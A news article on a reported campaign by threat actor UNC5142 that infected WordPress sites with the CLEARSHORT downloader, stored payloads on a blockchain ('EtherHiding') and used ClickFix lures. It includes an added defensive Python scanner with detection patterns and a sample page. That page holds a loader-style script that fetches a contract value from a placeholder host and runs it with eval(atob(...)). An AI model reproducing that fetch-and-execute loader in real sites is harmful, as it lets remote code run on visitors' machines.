More than 14,000 WordPress sites hacked, used to spread malware

WordPress is one of the most popular content management systems on the Internet. In fact, more than 43 percent of all websites run on WordPress. This makes the latest attack on WordPress sites by a new threat actor all the more concerning.

According to a new report from the Google Threat Intelligence Group (GTIG), a new malicious actor named UNC5142 has successfully hijacked WordPress sites and used a completely new technique to spread malware across the web. According to the report, UNC5142 identifies vulnerable WordPress websites, often ones using flawed WordPress themes, plugins or databases.

Targeted WordPress sites are allegedly infected with CLEARSHORT, a multi-stage JavaScript downloader that distributes the malware. The threat group then deploys a new technique called “EtherHiding”, activated by CLEARSHORT.

Google describes EtherHiding as “a technique used to hide malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain.” This use of blockchain to spread malicious code is unique and makes stopping the spread of malware all the more difficult.

The smart contract containing the code on the blockchain then calls a CLEARSHORT landing page, often hosted on a Cloudflare developer page, which uses a ClickFix social engineering tactic. This tactic tricks the website visitor into executing malicious commands on their computer through Windows’ Run dialog box or Mac’s Terminal application.
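For site owners, the chain described above suggests one thing to look for in served pages: an inline script that both reads from a blockchain and executes what it gets back. The following Python check is an added example, not code from the GTIG report or from Google; the signal patterns, the flagging rule and the sample page are assumptions constructed for illustration.

```python
import re

# Heuristic signals chosen for this example (assumptions, not indicators from the GTIG report).
SIGNALS = {
    "contract_read": re.compile(r"\beth_call\b|new\s+[\w.]*Contract\s*\("),
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "decode_step": re.compile(r"\batob\s*\(|fromCharCode"),
    "dynamic_exec": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def classify(js):
    """Return (signal names found, True if the script reads a chain AND executes data)."""
    hits = {name for name, rx in SIGNALS.items() if rx.search(js)}
    reads_chain = bool(hits & {"contract_read", "contract_address"})
    return hits, reads_chain and "dynamic_exec" in hits


def scan_page(html):
    """List (script index, sorted signals) for every flagged inline script."""
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        hits, flagged = classify(match.group(1))
        if flagged:
            findings.append((index, sorted(hits)))
    return findings


# Constructed sample page: placeholder addresses and a non-resolving RPC host.
ADDR_A = "0x" + "0" * 39 + "1"
ADDR_B = "0x" + "0" * 39 + "2"
SAMPLE_HTML = (
    "<html><body>"
    # 0: ordinary analytics snippet, no signals
    "<script>window.dataLayer = window.dataLayer || [];</script>"
    # 1: benign widget that reads a contract but never executes the result
    '<script>new ethers.Contract("' + ADDR_A + '", abi, p).totalSupply();</script>'
    # 2: loader shape: contract read, decode, then dynamic execution
    '<script>fetch("https://rpc.example.invalid", {method: "POST", body: '
    'JSON.stringify({method: "eth_call", params: [{to: "' + ADDR_B + '"}]})})'
    ".then(r => r.json()).then(j => eval(atob(j.result)));</script>"
    "</body></html>"
)

if __name__ == "__main__":
    for index, signals in scan_page(SAMPLE_HTML):
        print(f"inline script #{index}: {', '.join(signals)}")
```

Requiring both a chain read and dynamic execution keeps ordinary wallet or token widgets from being flagged; a hit is a reason to compare the theme or plugin file against a known-good copy, not proof of compromise.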

UNC5142 attacks are often financially motivated, according to Google. GTIG claims to have been tracking UNC5142 since 2023. However, Google reports that UNC5142 suddenly stopped all activity in July 2025.

This could mean that this new threat group, which has been successfully running its malware campaigns, has simply decided to step aside. It could also mean that the threat actor has changed its techniques, successfully hiding its latest actions, and is continuing to hack vulnerable websites today.
